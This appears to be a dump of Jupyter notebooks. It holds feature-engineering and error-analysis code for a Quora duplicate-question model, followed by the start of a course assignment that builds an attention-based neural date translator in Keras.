"def calc_common_stop_words_min(row):\n q1 = word_tokenize(row['question1'])\n q2 = word_tokenize(row['question2'])\n stop_words_q1 = set([x for x in q1 if x in stop_words])\n stop_words_q2 = set([x for x in q2 if x in stop_words])\n num_intersect = len(stop_words_q1.intersection(stop_words_q2))\n return num_intersect / get_min_len_qn(row)",
"_____no_output_____"
],
[
"def calc_common_nouns_min(row):\n q1_tokens = word_tokenize(row[\"question1\"].lower())\n q2_tokens = word_tokenize(row[\"question2\"].lower())\n pos_tagged_q1 = nltk.pos_tag(q1_tokens)\n pos_tagged_q2 = nltk.pos_tag(q2_tokens)\n # x[0] is the word, x[1] is the tag\n q1_nouns = set([x[0] for x in pos_tagged_q1 if x[1] == \"NN\"]) \n q2_nouns = set([x[0] for x in pos_tagged_q2 if x[1] == \"NN\"])\n return len(q1_nouns.intersection(q2_nouns)) / get_min_len_qn(row)",
"_____no_output_____"
],
[
"def mean_len_qns(row):\n return (len(word_tokenize(row[\"question1\"].lower())) + len(word_tokenize(row[\"question2\"].lower()))) / 2",
"_____no_output_____"
]
],
[
[
"##Kay Chi\n1. Common stop words max\n2. Common noun max\n3. Ratio of length of questions",
"_____no_output_____"
]
],
[
[
"def get_max_len_qn(row):\n return max(len(row['question1'].split()), len(row['question2'].split()))",
"_____no_output_____"
],
[
"def calc_common_stop_words_max(row):\n q1 = word_tokenize(row['question1'])\n q2 = word_tokenize(row['question2'])\n stop_words_q1 = set([x for x in q1 if x in stop_words])\n stop_words_q2 = set([x for x in q2 if x in stop_words])\n num_intersect = len(stop_words_q1.intersection(stop_words_q2))\n return num_intersect / get_max_len_qn(row)",
"_____no_output_____"
],
[
"def calc_common_nouns_max(row):\n q1_tokens = word_tokenize(row[\"question1\"].lower())\n q2_tokens = word_tokenize(row[\"question2\"].lower())\n pos_tagged_q1 = nltk.pos_tag(q1_tokens)\n pos_tagged_q2 = nltk.pos_tag(q2_tokens)\n # x[0] is the word, x[1] is the tag\n q1_nouns = set([x[0] for x in pos_tagged_q1 if x[1] == \"NN\"]) \n q2_nouns = set([x[0] for x in pos_tagged_q2 if x[1] == \"NN\"])\n return len(q1_nouns.intersection(q2_nouns)) / get_max_len_qn(row)",
"_____no_output_____"
],
[
"def ratio_len_qn(row):\n q1 = row['question1']\n q2 = row['question2']\n return len(q1) / len(q2)",
"_____no_output_____"
]
],
[
[
"## YS\n1. Common Word Ratio max ( words common/ max(len(q1), len(q2))) \n2. Common Adjectives max ( common adjectives /max(len(q1), len(q2)))\n3. Fuzz Token Set Ratio ",
"_____no_output_____"
]
],
[
[
"def common_word_ratio_max(row):\n q1 = row['question1']\n q2 = row['question2']\n return len(set(q1).intersection(set(q2))) / max(len(q1), len(q2))",
"_____no_output_____"
],
[
"# This has been tested to be correct, but result seems off.\ndef get_adjectives(text):\n blob = TextBlob(text)\n return set(word for (word,tag) in blob.tags if tag.startswith(\"JJ\"))\n \ndef common_adjectives_max(row):\n q1 = row['question1']\n q2 = row['question2']\n return len(get_adjectives(q1).intersection(get_adjectives(q2))) / max(len(q1), len(q2))",
"_____no_output_____"
],
[
"def calc_fuzz_token_set_ratio(row):\n q1 = row['question1']\n q2 = row['question2']\n return fuzz.token_set_ratio(q1, q2)",
"_____no_output_____"
]
],
[
[
"##**Neaton**",
"_____no_output_____"
]
],
[
[
"def common_words_ratio_min(row):\n set1 = set(row['question1'].lower().split())\n set2 = set(row['question2'].lower().split())\n common_words = len(set1.intersection(set2))\n return common_words/min(len(set1), len(set2))\n",
"_____no_output_____"
],
[
"# This has been tested to be correct, but result seems off.\ndef get_adjectives(text):\n blob = TextBlob(text)\n return set(word for (word,tag) in blob.tags if tag.startswith(\"JJ\"))\n \ndef common_adjectives_min(row):\n q1 = row['question1']\n q2 = row['question2']\n return len(get_adjectives(q1).intersection(get_adjectives(q2))) / min(len(q1), len(q2))",
"_____no_output_____"
],
[
"def fuzz_token_sort_ratio(row):\n q1 = row['question1']\n q2 = row['question2']\n fuzz_token = fuzz.token_sort_ratio(q1,q2)\n return fuzz_token",
"_____no_output_____"
],
[
"def max_longest_substring(row):\n q1 = row['question1']\n q2 = row['question2']\n match = SequenceMatcher(None, q1, q2).find_longest_match(0, len(q1), 0, len(q2))\n return match.size/max(len(q1), len(q2))",
"_____no_output_____"
]
],
[
[
"##Loading GloVe Embedding",
"_____no_output_____"
]
],
[
[
"%cd '../'",
"/content/drive/.shortcut-targets-by-id/1ixE_YVbTLblbUJgpPcDWfO-zlQeoNGq4/CS3244 45 Project\n"
],
[
"embeddings_index = {}\nwith open('glove.840B.300d.txt', encoding='utf-8') as f:\n for line in f:\n values = line.split(' ')\n word = values[0]\n embedding = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = embedding",
"_____no_output_____"
],
[
"def sent2vec(s):\n words = str(s).lower()\n words = word_tokenize(words)\n words = [w for w in words if not w in stop_words]\n words = [w for w in words if w.isalpha()]\n M = []\n for w in words:\n try:\n M.append(embeddings_index[w])\n except:\n M.append(np.zeros((1, 300)))\n M = np.array(M)\n v = M.sum(axis=0)\n return v / np.sqrt((v ** 2).sum())",
"_____no_output_____"
],
[
"def wrapper(train_set):\n\n #Preprocessing questions\n train_set['question1'] = train_set['question1'].apply(preprocess)\n train_set['question2'] = train_set['question2'].apply(preprocess)\n\n #JA\n train_set['common_words_ratio'] = train_set.apply(num_common_words_ratio, axis=1)\n train_set['common_tokens_ratio'] = train_set.apply(common_tokens_ratio_max, axis=1)\n train_set['fuzz_partial_ratio'] = train_set.apply(fuzz_partial_ratio, axis=1)\n train_set['min_longest_substring'] = train_set.apply(min_longest_substring, axis=1)\n\n #Penn Han\n train_set[\"unique_words_count\"] = train_set.apply(unique_words_count, axis=1)\n train_set[\"common_token_ratio_min\"] = train_set.apply(common_token_ratio_min, axis=1)\n train_set[\"fuzz_ratio\"] = train_set.apply(fuzz_ratio, axis=1)\n train_set[\"abs_len_difference\"] = train_set.apply(abs_len_difference, axis=1)\n\n #train_set[\"tfidf_matrix_q1\"] = train_set.apply(mean_tfidf_value_q1, axis=1)\n #train_set[\"tfidf_matrix_q2\"] = train_set.apply(mean_tfidf_value_q2, axis=1)\n #train_set[\"mean_idfweighted_vector_q1\"] = train_set.apply(mean_idfweighted_vector_q1, axis=1)\n #train_set[\"mean_idfweighted_vector_q2\"] = train_set.apply(mean_idfweighted_vector_q2, axis=1)\n\n #Jeremy\n train_set['common_stop_words_min'] = train_set.apply(calc_common_stop_words_min, axis=1)\n train_set['common_nouns_min'] = train_set.apply(calc_common_nouns_min, axis=1)\n train_set['mean_len'] = train_set.apply(mean_len_qns, axis=1)\n\n #KC\n train_set['common_stop_words_max'] = train_set.apply(calc_common_stop_words_max, axis=1)\n train_set['common_nouns_max'] = train_set.apply(calc_common_nouns_max, axis=1)\n train_set['ratio_len_qn'] = train_set.apply(ratio_len_qn, axis=1)\n\n #YS\n train_set['common_word_ratio_max'] = train_set.apply(common_word_ratio_max, axis=1)\n train_set['common_adjectives_max'] = train_set.apply(common_adjectives_max, axis=1)\n train_set['fuzz_token_set_ratio'] = train_set.apply(calc_fuzz_token_set_ratio, axis=1)\n\n #Neaton\n train_set['common_words_ratio_min'] = train_set.apply(common_words_ratio_min, axis=1)\n train_set['common_adjectives_min'] = train_set.apply(common_adjectives_min, axis=1)\n train_set['fuzz_token_sort_ratio'] = train_set.apply(fuzz_token_sort_ratio, axis=1)\n train_set['max_longest_substring'] = train_set.apply(max_longest_substring, axis=1)\n\n question1_vectors = np.zeros((train_set.shape[0], 300))\n for i, q in enumerate(tqdm_notebook(train_set.question1.values)):\n question1_vectors[i, :] = sent2vec(q)\n \n question2_vectors = np.zeros((train_set.shape[0], 300))\n for i, q in enumerate(tqdm_notebook(train_set.question2.values)):\n question2_vectors[i, :] = sent2vec(q)\n \n train_set['embed_cos_dist'] = [cosine(x, y) for (x, y) in zip(np.nan_to_num(question1_vectors), np.nan_to_num(question2_vectors))]\n\n\n return train_set\n",
"_____no_output_____"
],
[
"train_set = pd.read_csv('features_with_word_embedding.csv', index_col=[0])",
"_____no_output_____"
],
[
"#features = wrapper(train_set)",
"_____no_output_____"
],
[
"SEED = 42\nTRAIN_TEST = 0.1\nMAX_WORDS = 20000\nMAX_SEQUENCE = 25\n\nY_labels = train_set[\"is_duplicate\"]\nX_features = train_set.drop(\"is_duplicate\", axis=1)\n\nX_train, X_test, y_train, y_test = train_test_split(X_features, Y_labels, test_size=TRAIN_TEST, random_state=SEED)",
"_____no_output_____"
],
[
"q1_test = X_test['question1']\nq2_test = X_test['question2']\nq1_train = X_train['question1'].astype(str)\nq2_train = X_train['question2'].astype(str)",
"_____no_output_____"
],
[
"X_test.drop(['question1', 'question2', 'qid1', 'qid2'], axis=1, inplace=True)",
"_____no_output_____"
],
[
"#dic = {'question1':[\"How to overcome fear\"], \"question2\": [\"How not to be scared\"] }\n\n#train_set = pd.DataFrame(dic)",
"_____no_output_____"
],
[
"#final_features = features.drop(['question1', 'question2'], axis=1)",
"_____no_output_____"
],
[
"id = X_test.reset_index()['id']",
"_____no_output_____"
],
[
"MAX_SEQUENCE = 25\nquestions = q1_train.tolist() + q2_train.tolist()\ntokenizer = Tokenizer(num_words=MAX_WORDS)\ntokenizer.fit_on_texts(questions)\n\nquestion1_token = tokenizer.texts_to_sequences(q1_test.tolist())\nquestion2_token = tokenizer.texts_to_sequences(q2_test.tolist())\n\nq1_prepared = pad_sequences(question1_token, maxlen=MAX_SEQUENCE)\nq2_prepared = pad_sequences(question2_token, maxlen=MAX_SEQUENCE)",
"_____no_output_____"
],
[
"q1_prepared",
"_____no_output_____"
]
],
[
[
"## Final RNN Model",
"_____no_output_____"
]
],
[
[
"incorrects = model.predict([q1_prepared, q2_prepared, X_test], verbose=1)",
"1264/1264 [==============================] - 39s 29ms/step\n"
],
[
"incorrects[incorrects > 0.5] = 1\nincorrects[incorrects <= 0.5] = 0\nflattened_incorrect = incorrects.flatten()",
"_____no_output_____"
],
[
"y_pred = flattened_incorrect",
"_____no_output_____"
],
[
"final_df = pd.DataFrame(id)\nfinal_df['Actual'] = y_test.values\nfinal_df['Pred'] = y_pred.astype(int)",
"_____no_output_____"
],
[
"wrong_class = final_df[final_df['Actual'] != final_df['Pred']]",
"_____no_output_____"
]
],
[
[
"## Deep dive into the False Positives For Tuned Model",
"_____no_output_____"
]
],
[
[
"wrong_class",
"_____no_output_____"
],
[
"false_positives = wrong_class[wrong_class['Actual'] == 0]",
"_____no_output_____"
],
[
"false_positives",
"_____no_output_____"
],
[
"false_positives\nfalse_positives_id = false_positives['id'].values",
"_____no_output_____"
],
[
"fp_df = q1_test.reset_index()\nfp_df['question2'] = q2_test.reset_index()['question2']\nfp_df['Actual'] = y_test.values\nfp_df['Pred'] = y_pred.astype(int)",
"_____no_output_____"
],
[
"fp_df = fp_df[fp_df.id.isin(false_positives_id)]",
"_____no_output_____"
],
[
"fp_df.reset_index(inplace=True)\nfp_df = fp_df.drop(['index'], axis=1)",
"_____no_output_____"
],
[
"fp_df",
"_____no_output_____"
],
[
"fp_df.loc[0:3]",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e705e76b4b0fff8605c9bf275ea448995e814ccb | 111,844 | ipynb | Jupyter Notebook | Notebooks/Course 5 Sequence Models/Neural_machine_translation_with_attention_v4a.ipynb | JiningSong/Deep-Learning-Specialization-Study-Notes | 12c4acd500893b636758aca805fca61f35ed6784 | [
"MIT"
] | null | null | null | Notebooks/Course 5 Sequence Models/Neural_machine_translation_with_attention_v4a.ipynb | JiningSong/Deep-Learning-Specialization-Study-Notes | 12c4acd500893b636758aca805fca61f35ed6784 | [
"MIT"
] | null | null | null | Notebooks/Course 5 Sequence Models/Neural_machine_translation_with_attention_v4a.ipynb | JiningSong/Deep-Learning-Specialization-Study-Notes | 12c4acd500893b636758aca805fca61f35ed6784 | [
"MIT"
] | null | null | null | 60.950409 | 22,000 | 0.547933 | [
[
[
"# Neural Machine Translation\n\nWelcome to your first programming assignment for this week! \n\n* You will build a Neural Machine Translation (NMT) model to translate human-readable dates (\"25th of June, 2009\") into machine-readable dates (\"2009-06-25\"). \n* You will do this using an attention model, one of the most sophisticated sequence-to-sequence models. \n\nThis notebook was produced together with NVIDIA's Deep Learning Institute. ",
"_____no_output_____"
],
[
"## Table of Contents\n\n- [Packages](#0)\n- [1 - Translating Human Readable Dates Into Machine Readable Dates](#1)\n - [1.1 - Dataset](#1-1)\n- [2 - Neural Machine Translation with Attention](#2)\n - [2.1 - Attention Mechanism](#2-1)\n - [Exercise 1 - one_step_attention](#ex-1)\n - [Exercise 2 - modelf](#ex-2)\n - [Exercise 3 - Compile the Model](#ex-3)\n- [3 - Visualizing Attention (Optional / Ungraded)](#3)\n - [3.1 - Getting the Attention Weights From the Network](#3-1)",
"_____no_output_____"
],
[
"<a name='0'></a>\n## Packages",
"_____no_output_____"
]
],
[
[
"from tensorflow.keras.layers import Bidirectional, Concatenate, Permute, Dot, Input, LSTM, Multiply\nfrom tensorflow.keras.layers import RepeatVector, Dense, Activation, Lambda\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import load_model, Model\nimport tensorflow.keras.backend as K\nimport tensorflow as tf\nimport numpy as np\n\nfrom faker import Faker\nimport random\nfrom tqdm import tqdm\nfrom babel.dates import format_date\nfrom nmt_utils import *\nimport matplotlib.pyplot as plt\n%matplotlib inline",
"_____no_output_____"
]
],
[
[
"<a name='1'></a>\n## 1 - Translating Human Readable Dates Into Machine Readable Dates\n\n* The model you will build here could be used to translate from one language to another, such as translating from English to Hindi. \n* However, language translation requires massive datasets and usually takes days of training on GPUs. \n* To give you a place to experiment with these models without using massive datasets, we will perform a simpler \"date translation\" task. \n* The network will input a date written in a variety of possible formats (*e.g. \"the 29th of August 1958\", \"03/30/1968\", \"24 JUNE 1987\"*) \n* The network will translate them into standardized, machine readable dates (*e.g. \"1958-08-29\", \"1968-03-30\", \"1987-06-24\"*). \n* We will have the network learn to output dates in the common machine-readable format YYYY-MM-DD. \n\n<!-- \nTake a look at [nmt_utils.py](./nmt_utils.py) to see all the formatting. Count and figure out how the formats work, you will need this knowledge later. !--> ",
"_____no_output_____"
],
[
"<a name='1-1'></a>\n### 1.1 - Dataset\n\nWe will train the model on a dataset of 10,000 human readable dates and their equivalent, standardized, machine readable dates. Let's run the following cells to load the dataset and print some examples. ",
"_____no_output_____"
]
],
[
[
"m = 10000\ndataset, human_vocab, machine_vocab, inv_machine_vocab = load_dataset(m)",
"100%|██████████| 10000/10000 [00:00<00:00, 26051.77it/s]\n"
],
[
"dataset[:10]",
"_____no_output_____"
]
],
[
[
"You've loaded:\n- `dataset`: a list of tuples of (human readable date, machine readable date).\n- `human_vocab`: a python dictionary mapping all characters used in the human readable dates to an integer-valued index.\n- `machine_vocab`: a python dictionary mapping all characters used in machine readable dates to an integer-valued index. \n - **Note**: These indices are not necessarily consistent with `human_vocab`. \n- `inv_machine_vocab`: the inverse dictionary of `machine_vocab`, mapping from indices back to characters. \n\nLet's preprocess the data and map the raw text data into the index values. \n- We will set Tx=30 \n - We assume Tx is the maximum length of the human readable date.\n - If we get a longer input, we would have to truncate it.\n- We will set Ty=10\n - \"YYYY-MM-DD\" is 10 characters long.",
"_____no_output_____"
]
],
[
[
"Tx = 30\nTy = 10\nX, Y, Xoh, Yoh = preprocess_data(dataset, human_vocab, machine_vocab, Tx, Ty)\n\nprint(\"X.shape:\", X.shape)\nprint(\"Y.shape:\", Y.shape)\nprint(\"Xoh.shape:\", Xoh.shape)\nprint(\"Yoh.shape:\", Yoh.shape)",
"X.shape: (10000, 30)\nY.shape: (10000, 10)\nXoh.shape: (10000, 30, 37)\nYoh.shape: (10000, 10, 11)\n"
]
],
[
[
"You now have:\n- `X`: a processed version of the human readable dates in the training set.\n - Each character in X is replaced by an index (integer) mapped to the character using `human_vocab`. \n - Each date is padded to ensure a length of $T_x$ using a special character (< pad >). \n - `X.shape = (m, Tx)` where m is the number of training examples in a batch.\n- `Y`: a processed version of the machine readable dates in the training set.\n - Each character is replaced by the index (integer) it is mapped to in `machine_vocab`. \n - `Y.shape = (m, Ty)`. \n- `Xoh`: one-hot version of `X`\n - Each index in `X` is converted to the one-hot representation (if the index is 2, the one-hot version has the index position 2 set to 1, and the remaining positions are 0.\n - `Xoh.shape = (m, Tx, len(human_vocab))`\n- `Yoh`: one-hot version of `Y`\n - Each index in `Y` is converted to the one-hot representation. \n - `Yoh.shape = (m, Ty, len(machine_vocab))`. \n - `len(machine_vocab) = 11` since there are 10 numeric digits (0 to 9) and the `-` symbol.",
"_____no_output_____"
],
[
"* Let's also look at some examples of preprocessed training examples. \n* Feel free to play with `index` in the cell below to navigate the dataset and see how source/target dates are preprocessed. ",
"_____no_output_____"
]
],
[
[
"index = 0\nprint(\"Source date:\", dataset[index][0])\nprint(\"Target date:\", dataset[index][1])\nprint()\nprint(\"Source after preprocessing (indices):\", X[index])\nprint(\"Target after preprocessing (indices):\", Y[index])\nprint()\nprint(\"Source after preprocessing (one-hot):\", Xoh[index])\nprint(\"Target after preprocessing (one-hot):\", Yoh[index])",
"Source date: 27 august 1971\nTarget date: 1971-08-27\n\nSource after preprocessing (indices): [ 5 10 0 13 31 19 31 29 30 0 4 12 10 4 36 36 36 36 36 36 36 36 36 36\n 36 36 36 36 36 36]\nTarget after preprocessing (indices): [ 2 10 8 2 0 1 9 0 3 8]\n\nSource after preprocessing (one-hot): [[0. 0. 0. ... 0. 0. 0.]\n [0. 0. 0. ... 0. 0. 0.]\n [1. 0. 0. ... 0. 0. 0.]\n ...\n [0. 0. 0. ... 0. 0. 1.]\n [0. 0. 0. ... 0. 0. 1.]\n [0. 0. 0. ... 0. 0. 1.]]\nTarget after preprocessing (one-hot): [[0. 0. 1. 0. 0. 0. 0. 0. 0. 0. 0.]\n [0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 1.]\n [0. 0. 0. 0. 0. 0. 0. 0. 1. 0. 0.]\n [0. 0. 1. 0. 0. 0. 0. 0. 0. 0. 0.]\n [1. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.]\n [0. 1. 0. 0. 0. 0. 0. 0. 0. 0. 0.]\n [0. 0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]\n [1. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.]\n [0. 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]\n [0. 0. 0. 0. 0. 0. 0. 0. 1. 0. 0.]]\n"
]
],
[
[
"<a name='2'></a>\n## 2 - Neural Machine Translation with Attention\n\n* If you had to translate a book's paragraph from French to English, you would not read the whole paragraph, then close the book and translate. \n* Even during the translation process, you would read/re-read and focus on the parts of the French paragraph corresponding to the parts of the English you are writing down. \n* The attention mechanism tells a Neural Machine Translation model where it should pay attention to at any step. \n\n<a name='2-1'></a>\n### 2.1 - Attention Mechanism\n\nIn this part, you will implement the attention mechanism presented in the lecture videos. \n* Here is a figure to remind you how the model works. \n * The diagram on the left shows the attention model. \n * The diagram on the right shows what one \"attention\" step does to calculate the attention variables $\\alpha^{\\langle t, t' \\rangle}$.\n * The attention variables $\\alpha^{\\langle t, t' \\rangle}$ are used to compute the context variable $context^{\\langle t \\rangle}$ for each timestep in the output ($t=1, \\ldots, T_y$). \n\n<table>\n<td> \n<img src=\"images/attn_model.png\" style=\"width:500;height:500px;\"> <br>\n</td> \n<td> \n<img src=\"images/attn_mechanism.png\" style=\"width:500;height:500px;\"> <br>\n</td> \n</table>\n<caption><center> **Figure 1**: Neural machine translation with attention</center></caption>\n",
"_____no_output_____"
],
[
"Here are some properties of the model that you may notice: \n\n#### Pre-attention and Post-attention LSTMs on both sides of the attention mechanism\n- There are two separate LSTMs in this model (see diagram on the left): pre-attention and post-attention LSTMs.\n- *Pre-attention* Bi-LSTM is the one at the bottom of the picture is a Bi-directional LSTM and comes *before* the attention mechanism.\n - The attention mechanism is shown in the middle of the left-hand diagram.\n - The pre-attention Bi-LSTM goes through $T_x$ time steps\n- *Post-attention* LSTM: at the top of the diagram comes *after* the attention mechanism. \n - The post-attention LSTM goes through $T_y$ time steps. \n\n- The post-attention LSTM passes the hidden state $s^{\\langle t \\rangle}$ and cell state $c^{\\langle t \\rangle}$ from one time step to the next. ",
"_____no_output_____"
],
[
"#### An LSTM has both a hidden state and cell state\n* In the lecture videos, we were using only a basic RNN for the post-attention sequence model\n * This means that the state captured by the RNN was outputting only the hidden state $s^{\\langle t\\rangle}$. \n* In this assignment, we are using an LSTM instead of a basic RNN.\n * So the LSTM has both the hidden state $s^{\\langle t\\rangle}$ and the cell state $c^{\\langle t\\rangle}$. ",
"_____no_output_____"
],
[
"#### Each time step does not use predictions from the previous time step\n* Unlike previous text generation examples earlier in the course, in this model, the post-attention LSTM at time $t$ does not take the previous time step's prediction $y^{\\langle t-1 \\rangle}$ as input.\n* The post-attention LSTM at time 't' only takes the hidden state $s^{\\langle t\\rangle}$ and cell state $c^{\\langle t\\rangle}$ as input. \n* We have designed the model this way because unlike language generation (where adjacent characters are highly correlated) there isn't as strong a dependency between the previous character and the next character in a YYYY-MM-DD date.",
"_____no_output_____"
],
[
"#### Concatenation of hidden states from the forward and backward pre-attention LSTMs\n- $\\overrightarrow{a}^{\\langle t \\rangle}$: hidden state of the forward-direction, pre-attention LSTM.\n- $\\overleftarrow{a}^{\\langle t \\rangle}$: hidden state of the backward-direction, pre-attention LSTM.\n- $a^{\\langle t \\rangle} = [\\overrightarrow{a}^{\\langle t \\rangle}, \\overleftarrow{a}^{\\langle t \\rangle}]$: the concatenation of the activations of both the forward-direction $\\overrightarrow{a}^{\\langle t \\rangle}$ and backward-directions $\\overleftarrow{a}^{\\langle t \\rangle}$ of the pre-attention Bi-LSTM. ",
"_____no_output_____"
],
[
"#### Computing \"energies\" $e^{\\langle t, t' \\rangle}$ as a function of $s^{\\langle t-1 \\rangle}$ and $a^{\\langle t' \\rangle}$\n- Recall in the lesson videos \"Attention Model\", at time 6:45 to 8:16, the definition of \"e\" as a function of $s^{\\langle t-1 \\rangle}$ and $a^{\\langle t \\rangle}$.\n - \"e\" is called the \"energies\" variable.\n - $s^{\\langle t-1 \\rangle}$ is the hidden state of the post-attention LSTM\n - $a^{\\langle t' \\rangle}$ is the hidden state of the pre-attention LSTM.\n - $s^{\\langle t-1 \\rangle}$ and $a^{\\langle t \\rangle}$ are fed into a simple neural network, which learns the function to output $e^{\\langle t, t' \\rangle}$.\n - $e^{\\langle t, t' \\rangle}$ is then used when computing the attention $a^{\\langle t, t' \\rangle}$ that $y^{\\langle t \\rangle}$ should pay to $a^{\\langle t' \\rangle}$.",
"_____no_output_____"
],
[
"- The diagram on the right of figure 1 uses a `RepeatVector` node to copy $s^{\\langle t-1 \\rangle}$'s value $T_x$ times.\n- Then it uses `Concatenation` to concatenate $s^{\\langle t-1 \\rangle}$ and $a^{\\langle t \\rangle}$.\n- The concatenation of $s^{\\langle t-1 \\rangle}$ and $a^{\\langle t \\rangle}$ is fed into a \"Dense\" layer, which computes $e^{\\langle t, t' \\rangle}$. \n- $e^{\\langle t, t' \\rangle}$ is then passed through a softmax to compute $\\alpha^{\\langle t, t' \\rangle}$.\n- Note that the diagram doesn't explicitly show variable $e^{\\langle t, t' \\rangle}$, but $e^{\\langle t, t' \\rangle}$ is above the Dense layer and below the Softmax layer in the diagram in the right half of figure 1.\n- We'll explain how to use `RepeatVector` and `Concatenation` in Keras below. ",
"_____no_output_____"
],
[
"#### Implementation Details\n \nLet's implement this neural translator. You will start by implementing two functions: `one_step_attention()` and `model()`.\n\n#### one_step_attention\n* The inputs to the one_step_attention at time step $t$ are:\n - $[a^{<1>},a^{<2>}, ..., a^{<T_x>}]$: all hidden states of the pre-attention Bi-LSTM.\n - $s^{<t-1>}$: the previous hidden state of the post-attention LSTM \n* one_step_attention computes:\n - $[\\alpha^{<t,1>},\\alpha^{<t,2>}, ..., \\alpha^{<t,T_x>}]$: the attention weights\n - $context^{ \\langle t \\rangle }$: the context vector:\n \n$$context^{<t>} = \\sum_{t' = 1}^{T_x} \\alpha^{<t,t'>}a^{<t'>}\\tag{1}$$ \n\n##### Clarifying 'context' and 'c'\n- In the lecture videos, the context was denoted $c^{\\langle t \\rangle}$\n- In the assignment, we are calling the context $context^{\\langle t \\rangle}$.\n - This is to avoid confusion with the post-attention LSTM's internal memory cell variable, which is also denoted $c^{\\langle t \\rangle}$.",
"_____no_output_____"
],
[
"<a name='ex-1'></a>\n### Exercise 1 - one_step_attention \n\nImplement `one_step_attention()`. \n\n* The function `model()` will call the layers in `one_step_attention()` $T_y$ times using a for-loop.\n* It is important that all $T_y$ copies have the same weights. \n * It should not reinitialize the weights every time. \n * In other words, all $T_y$ steps should have shared weights. \n* Here's how you can implement layers with shareable weights in Keras:\n 1. Define the layer objects in a variable scope that is outside of the `one_step_attention` function. For example, defining the objects as global variables would work.\n - Note that defining these variables inside the scope of the function `model` would technically work, since `model` will then call the `one_step_attention` function. For the purposes of making grading and troubleshooting easier, we are defining these as global variables. Note that the automatic grader will expect these to be global variables as well.\n 2. Call these objects when propagating the input.\n* We have defined the layers you need as global variables. \n * Please run the following cells to create them. \n * Please note that the automatic grader expects these global variables with the given variable names. For grading purposes, please do not rename the global variables.\n* Please check the Keras documentation to learn more about these layers. The layers are functions. Below are examples of how to call these functions.\n * [RepeatVector()](https://www.tensorflow.org/api_docs/python/tf/keras/layers/RepeatVector)\n```Python\nvar_repeated = repeat_layer(var1)\n```\n * [Concatenate()](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Concatenate) \n```Python\nconcatenated_vars = concatenate_layer([var1,var2,var3])\n```\n * [Dense()](https://keras.io/layers/core/#dense) \n```Python\nvar_out = dense_layer(var_in)\n```\n * [Activation()](https://keras.io/layers/core/#activation) \n```Python\nactivation = activation_layer(var_in) \n```\n * [Dot()](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Dot) \n```Python\ndot_product = dot_layer([var1,var2])\n```",
"_____no_output_____"
]
],
[
[
"# Defined shared layers as global variables\nrepeator = RepeatVector(Tx)\nconcatenator = Concatenate(axis=-1)\ndensor1 = Dense(10, activation = \"tanh\")\ndensor2 = Dense(1, activation = \"relu\")\nactivator = Activation(softmax, name='attention_weights') # We are using a custom softmax(axis = 1) loaded in this notebook\ndotor = Dot(axes = 1)",
"_____no_output_____"
],
[
"# UNQ_C1 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)\n# GRADED FUNCTION: one_step_attention\n\ndef one_step_attention(a, s_prev):\n \"\"\"\n Performs one step of attention: Outputs a context vector computed as a dot product of the attention weights\n \"alphas\" and the hidden states \"a\" of the Bi-LSTM.\n \n Arguments:\n a -- hidden state output of the Bi-LSTM, numpy-array of shape (m, Tx, 2*n_a)\n s_prev -- previous hidden state of the (post-attention) LSTM, numpy-array of shape (m, n_s)\n \n Returns:\n context -- context vector, input of the next (post-attention) LSTM cell\n \"\"\"\n \n ### START CODE HERE ###\n # Use repeator to repeat s_prev to be of shape (m, Tx, n_s) so that you can concatenate it with all hidden states \"a\" (≈ 1 line)\n s_prev = repeator(s_prev)\n # Use concatenator to concatenate a and s_prev on the last axis (≈ 1 line)\n # For grading purposes, please list 'a' first and 's_prev' second, in this order.\n concat = concatenator([a, s_prev])\n # Use densor1 to propagate concat through a small fully-connected neural network to compute the \"intermediate energies\" variable e. (≈1 lines)\n e = densor1(concat)\n # Use densor2 to propagate e through a small fully-connected neural network to compute the \"energies\" variable energies. (≈1 lines)\n energies = densor2(e)\n # Use \"activator\" on \"energies\" to compute the attention weights \"alphas\" (≈ 1 line)\n alphas = activator(energies)\n # Use dotor together with \"alphas\" and \"a\", in this order, to compute the context vector to be given to the next (post-attention) LSTM-cell (≈ 1 line)\n context = dotor([alphas, a])\n ### END CODE HERE ###\n \n return context",
"_____no_output_____"
],
[
